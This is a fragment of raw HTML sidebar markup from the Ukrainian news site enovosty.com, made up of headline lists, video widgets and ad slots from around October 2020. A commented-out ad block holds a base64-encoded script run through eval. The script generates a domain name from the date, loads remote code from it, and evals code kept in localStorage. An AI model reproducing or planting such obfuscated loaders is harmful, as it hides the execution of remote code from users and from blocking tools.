5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/2809-padenie-promyshlennogo-proizvodstva-v-ukraine-razrushiteli-mashin-ili-strasti-po-lokalizacii">Падение промышленного производства в Украине: разрушители машин или Страсти по локализации</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4818749"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/2209-byudzhet-2021-proekt-novyj-no-vse-po-staromu-chem-zakroyut-diry-v-budzhete">Бюджет-2021: на что вырастут расходы и чем закроют "дыру" в бюджете</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4818211"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/finance/full/1709-obidet-uchitelya-mozhet-kazhdyj-no-nikto-ne-pomogaet-materialno">4 000 евро учителю: Обидеть педагога может каждый, но никто не помогает материально</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4818332"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/1809-partiya-vakarchuka-golos-otkazalas-igrat-v-sxemy-na-vyborax-v-dnepre">Партия Вакарчука «Голос» отказалась играть в «схемы» на выборах в Днепре</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4818023"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/1609-odesskaya-oblast-rekordsmen-po-skorosti-stroitelstva-korrupcionnyx-sxem">Одесская область – рекордсмен по скорости строительства… коррупционных схем</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4817598"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/markets/full/1109-vlast-nachala-nastuplenie-na-svobodu-interneta-slugi-naroda-xotyat-razreshit-pravooxranitelyam-dostup-k-noutbukam-i-smartfonam-ukraincev">Власть начала наступление на свободу интернета: "Слуги народа" хотят взять под контроль киберпространство</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><br /><div id='div-gpt-ad-1594991505318-0' style='width: 100%; height: 376px;'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594991505318-0'); });</script></div><br /><script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script><div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div><br><script async src="//whhrux.com/50c7l1912vli/m0p30yh8q768vuq786pkybrgz6.php"></script><div data-la-block="fc0a9a9b-1dbe-46f7-b141-804f98afe650"></div><br /><div id="adpartner-jsunit-6273"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.async = true;script.src = "//a4p.adpartner.pro/jsunit?id=6273&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br /> <div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_society/full/2909-moshhnyj-tornado-na-xersonshhine-poyavilis-apokalipticheskie-foto"><img width="142" height="88" alt="На Херсонщине прошел апокалиптический торнадо" src="https://enovosty.com/wp-content/uploads/2020/09/1601363341-4333.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_society/full/2909-moshhnyj-tornado-na-xersonshhine-poyavilis-apokalipticheskie-foto">На Херсонщине прошел апокалиптический торнадо</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/110-vojna-v-karabaxe-azerbajdzhan-razgromil-kolonnu-armii-protivnika-video"><img width="142" height="88" alt="Война в Карабахе: Азербайджан разгромил колонну армии противника" src="https://enovosty.com/wp-content/uploads/2020/10/photo_439744.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/110-vojna-v-karabaxe-azerbajdzhan-razgromil-kolonnu-armii-protivnika-video">Война в Карабахе: Азербайджан разгромил колонну армии противника</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2909-mishka-lukashenko-uletel-v-nebo-poyavilos-video-zabavnogo-perfomansa-minchan"><img width="142" height="88" alt="Мишка Лукашенко улетел в небо. Появилось видео забавного перфоманса минчан" src="https://enovosty.com/wp-content/uploads/2020/09/luk_shar.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2909-mishka-lukashenko-uletel-v-nebo-poyavilos-video-zabavnogo-perfomansa-minchan">Мишка Лукашенко улетел в небо. Появилось видео забавного перфоманса минчан</a></div></td></tr><tr><td class="view"><span><i></i>4844</span></td><td class="view"><span><i></i>4782</span></td><td class="view last"><span><i></i>3256</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news-auto/full/2909-lipovye-pisma-schastya-o-narusheniyax-skorostnogo-rezhima-kak-ne-popastsya-na-ulovki-moshennikov"><img width="142" height="88" alt="Липовые письма счастья о нарушениях скоростного режима: как не попасться на уловки мошенников" src="https://enovosty.com/wp-content/uploads/2020/09/urfpal0w3meaxiksss6nogctip6809pm89n9xwx6-600x338-e1601310936487.jpeg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-auto/full/2909-lipovye-pisma-schastya-o-narusheniyax-skorostnogo-rezhima-kak-ne-popastsya-na-ulovki-moshennikov">Липовые письма счастья о нарушениях скоростного режима: как не попасться на уловки мошенников</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/110-ubijstvo-pod-lvovom-vsplyli-podrobnosti-o-materi-rasstrelyavshej-svoix-detej-video"><img width="142" height="88" alt="Убийство под Львовом: Всплыли подробности о матери, расстрелявшей своих детей" src="https://enovosty.com/wp-content/uploads/2020/10/ruzh.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/110-ubijstvo-pod-lvovom-vsplyli-podrobnosti-o-materi-rasstrelyavshej-svoix-detej-video">Убийство под Львовом: Всплыли подробности о матери, расстрелявшей своих детей</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/510-potoki-vody-snosyat-doma-i-ubivayut-lyudej-na-franciyu-obrushilos-navodnenie-video"><img width="142" height="88" alt="Потоки воды сносят дома и убивают людей: на Францию обрушилось наводнение" src="https://enovosty.com/wp-content/uploads/2020/10/485461eed05c13d9f3a4a88bca25e88c.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/510-potoki-vody-snosyat-doma-i-ubivayut-lyudej-na-franciyu-obrushilos-navodnenie-video">Потоки воды сносят дома и убивают людей: на Францию обрушилось наводнение</a></div></td></tr><tr><td class="view"><span><i></i>3076</span></td><td class="view"><span><i></i>2737</span></td><td class="view last"><span><i></i>2325</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><br> <div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/510-stepanov-sdelal-trevozhnyj-prognoz-po-covid-19-v-ukraine" rel="bookmark">Степанов сделал тревожный прогноз по Covid-19 в Украине</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/zdorove/full/510-uchenye-rasskazali-nuzhno-li-podozrevat-covid-19-pri-nasmorke" rel="bookmark">Ученые рассказали, нужно ли подозревать COVID-19 при насморке</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/510-izrailskogo-scenariya-ne-budet-v-minzdrave-rasskazali-grozit-li-ukraine-totalnyj-karantin" rel="bookmark">Израильского сценария не будет: в Минздраве рассказали, грозит ли Украине тотальный карантин</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/510-novoe-karantinnoe-zonirovanie-v-ukraine-kto-popal-v-krasnuyu-zonu" rel="bookmark">Новое карантинное зонирование в Украине: кто попал в красную зону</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/510-v-parizhe-zakryvayutsya-bary-i-restorany-iz-za-covid-19" rel="bookmark">В Париже закрываются бары и рестораны из-за COVID-19</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/510-covid-19-v-ukraine-uzhe-v-11-oblastyax-bolnicy-zapolneny-bolee-chem-na-50" rel="bookmark">COVID-19: в Украине уже в 11 областях больницы заполнены более, чем на 50%</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/510-indiya-ispytala-giperzvukovuyu-ballisticheskuyu-raketu-video" rel="bookmark">Индия испытала гиперзвуковую баллистическую ракету (ВИДЕО)</a><br /></td> </tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Здоровье</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '31397', 31397, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '31397', 31397, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '31397', 31397, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/zdorove/full/110-amerikanskie-uchenye-rasskazali-chto-mozhet-spasti-ot-zarazheniya-covid-19">Американские ученые рассказали, что может спасти от заражения COVID-19 (8918)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/310-obnaruzhen-novyj-ostryj-vospalitelnyj-sindrom-svyazannyj-s-covid-19">Обнаружен новый острый воспалительный синдром, связанный с COVID-19 (6522)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/410-vrach-iz-izrailya-rasskazal-u-kogo-tochno-ne-poyavitsya-oslozhnenij-ot-covid-19">Врач из Израиля рассказал, у кого точно не появятся осложнения от COVID-19 (5143)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/110-vrach-immunolog-nazval-sroki-zaversheniya-aktivnoj-stadii-pandemii-covid-19">Врач-иммунолог назвал сроки завершения активной стадии пандемии COVID-19 (4683)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/3009-nazvany-xronicheskie-bolezni-kotorye-usugublyayut-vliyanie-covid-19">Названы хронические болезни, которые усугубляют влияние COVID-19 (4381)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/410-uchenye-opredelili-opasnejshuyu-mutaciyu-koronavirusa">Ученые определили опаснейшую мутацию коронавируса (2558)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2909-uchenye-vyyavili-svyaz-mezhdu-urovnem-vitamina-d-i-smertnostyu-ot-covid-19">Ученые выявили связь между уровнем витамина D и смертностью от COVID-19 (2426)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2909-uchenye-rasskazali-o-novom-posledstviyu-koronavirusa">Ученые рассказали о новом последствии коронавируса (2327)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2909-eks-glavnyj-sanvrach-ukrainy-rasskazal-kak-sokratit-zarazheniya-covid-19">Экс-главный санврач Украины рассказал, как сократить заражения COVID-19 (2251)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2909-uchenye-dopustili-koronavirusnuyu-opasnost-dlya-muzhchin">Коронавирус влияет на количество тестостерона в организме мужчин - исследование (2196)</a></h3></div> </div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4345567"><a href="https://enovosty.com/armiya/full/614-samolet-su-27" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/03/su-27-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/03/su-27-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/03/su-27-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/03/su-27.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/614-samolet-su-27" >Самолет Су-27</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4372282"><a href="https://enovosty.com/armiya/full/347-dvuhkoordinatnaya-kogerentno-impulsnaya-rls-krugovogo-obzora-delta" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/07/delta-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/07/delta-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/07/delta-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/07/delta.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/347-dvuhkoordinatnaya-kogerentno-impulsnaya-rls-krugovogo-obzora-delta" >Двухкоординатная когерентно-импульсная РЛС кругового обзора «Дельта»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4389759"><a href="https://enovosty.com/armiya/full/441-zenitno-raketnyj-kompleks-sea-wolf-velikobritaniya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/Sea_Wolf-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/09/Sea_Wolf-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/Sea_Wolf-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/Sea_Wolf.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/441-zenitno-raketnyj-kompleks-sea-wolf-velikobritaniya" >Зенитно-ракетный комплекс Sea Wolf (Великобритания)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4420352"><a href="https://enovosty.com/armiya/full/224-bronetransporter-nagmahon-izrail" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/01/Nagmachon-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/01/Nagmachon-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/01/Nagmachon-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/01/Nagmachon.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/224-bronetransporter-nagmahon-izrail" >Бронетранспортер Nagmahon (Израиль)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4307863"><a href="https://enovosty.com/person/full/bogolyubov-gennadij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/08/bogolyubov_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/08/bogolyubov_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/08/bogolyubov_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/bogolyubov-gennadij" >Боголюбов<br /> Геннадий</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4357878"><a href="https://enovosty.com/person/full/161-balashov-gennadij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/05/balashov_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/05/balashov_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/05/balashov_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/161-balashov-gennadij" >Балашов<br /> Геннадий</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4475061"><a href="https://enovosty.com/person/full/645-korban-gennadij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/10/korban-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/10/korban-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/10/korban.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/645-korban-gennadij" >Корбан<br /> Геннадий</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4657084"><a href="https://enovosty.com/person/full/2611-lavrov-sergej" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2017/11/lavrov-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2017/11/lavrov-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2017/11/lavrov.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/2611-lavrov-sergej" >Лавров<br /> Сергей</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/uk/news_society-ukr/full/510-ekspert-dala-prognoz-shhodo-perexodu-ukrainskix-shkil-na-distancijne-navchannya">Експерт дала прогноз щодо переходу українських шкіл на дистанційне навчання (3569)</a></p><p class="press"><a href="https://enovosty.com/uk/news_abroad-ukr/full/510-dopitlivij-bilij-vedmid-poshkodiv-kanadskij-ryatuvalnij-vertolit-foto">Допитливий білий ведмідь пошкодив канадський рятувальний вертоліт (ФОТО) (3292)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/510-v-rf-arestovan-eks-komandir-brigady-boevikov-dnr-chto-izvestno">В РФ арестован экс-командир бригады боевиков «ДНР»: что известно (3264)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/410-foto-dnya-v-minske-proshel-mnogotysyachnyj-marsh-osvobozhdeniya-foto">"Пошел вон - ты и твой ОМОН": в Минске прошел многотысячный "Марш освобождения" (ФОТО) (2879)</a></p><p class="press"><a href="https://enovosty.com/uk/news_kiev-ukr/full/410-na-spivochomu-poli-v-kiyevi-vidkrilasya-vistavka-xrizantem-divovizhni-foto">На Співочому полі в Києві відкрилася виставка хризантем: дивовижні фото (2365)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/510-armeniya-nanesla-udary-po-mingechaurskoj-tes-pomoshhnik-prezidenta-azerbajdzhana-foto">Армения нанесла удары по Мингечаурской ТЭС, - помощник президента Азербайджана (ФОТО) (2361)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/510-potoki-vody-snosyat-doma-i-ubivayut-lyudej-na-franciyu-obrushilos-navodnenie-video">Потоки воды сносят дома и убивают людей: на Францию обрушилось наводнение (ВИДЕО) (2325)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/410-armiya-ssha-vypustila-pervyj-vertolet-uh-60v-so-steklyannoj-kabinoj">Армия США выпустила первый вертолет UH-60V со "стеклянной" кабиной (2307)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/410-premer-ministr-denis-shmygal-predupredil-ukraincev-ob-otmene-pensij">Премьер-министр Денис Шмыгаль предупредил украинцев об отмене пенсий (2047)</a></p><p class="press"><a href="https://enovosty.com/uk/zdorove-ukr/full/510-britanskij-likar-dav-poradi-yak-vberegtisya-vid-covid-19-vzimku">Британський лікар дав поради, як вберегтися від COVID-19 взимку (1947)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/2909-aleksandr-kapuka-o-protestax-na-kzhrk-my-za-stabilizaciyu-situacii-i-dostizhenie-konstruktivnogo-resheniya">Александр Капука о протестах на КЖРК: Мы – за стабилизацию ситуации и достижение конструктивного решения</a></p><p class="press"><a href="https://enovosty.com/publications/full/2309-milliony-na-boltax-ili-kak-i-pochemu-kazhdyj-ukrainec-vskore-zaplatit-v-karman-klanu-byvshix-nalogovikov">Миллионы на болтах, или как и почему каждый украинец вскоре заплатит в карман клану бывших налоговиков</a></p><p class="press"><a href="https://enovosty.com/publications/full/2309-zheleznoj-doroge-nuzhny-novye-vagony">Железной дороге нужны новые вагоны</a></p></div><div id='div-gpt-ad-1594112815543-0'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });</script></div></br><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/2509-rossiya-poteryala-evropu"><img alt="Россия потеряла Европу" src="https://enovosty.com/wp-content/uploads/2020/09/1512257_1384140071842820_1224449244_o-1-112x70.jpg"><div>Лилия Шевцова</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/2509-rossiya-poteryala-evropu">Россия потеряла Европу</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/2509-rossiya-poteryala-evropu">Кремль не оставил Европе выбора, заставляя ее выйти из угла и вспомнить о своих генах. Россия потеряла Европу</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_incidents/full/3009-ochevidec-krusheniya-an-26-pod-xarkovom-podelilsya-novymi-detalyami">Очевидец крушения Ан-26 под Харьковом поделился новыми деталями (10009)</a></p><p class="press"><a href="https://enovosty.com/zdorove/full/110-amerikanskie-uchenye-rasskazali-chto-mozhet-spasti-ot-zarazheniya-covid-19">Американские ученые рассказали, что может спасти от заражения COVID-19 (8920)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/310-vojna-dronov-v-karabaxe-bpla-obstrelivayut-protivnika-i-sami-prevrashhayutsya-v-bombu">Война дронов в Карабахе: БПЛА обстреливают противника и сами превращаются в бомбу (8914)</a></p></div></div></div><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br> <div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div 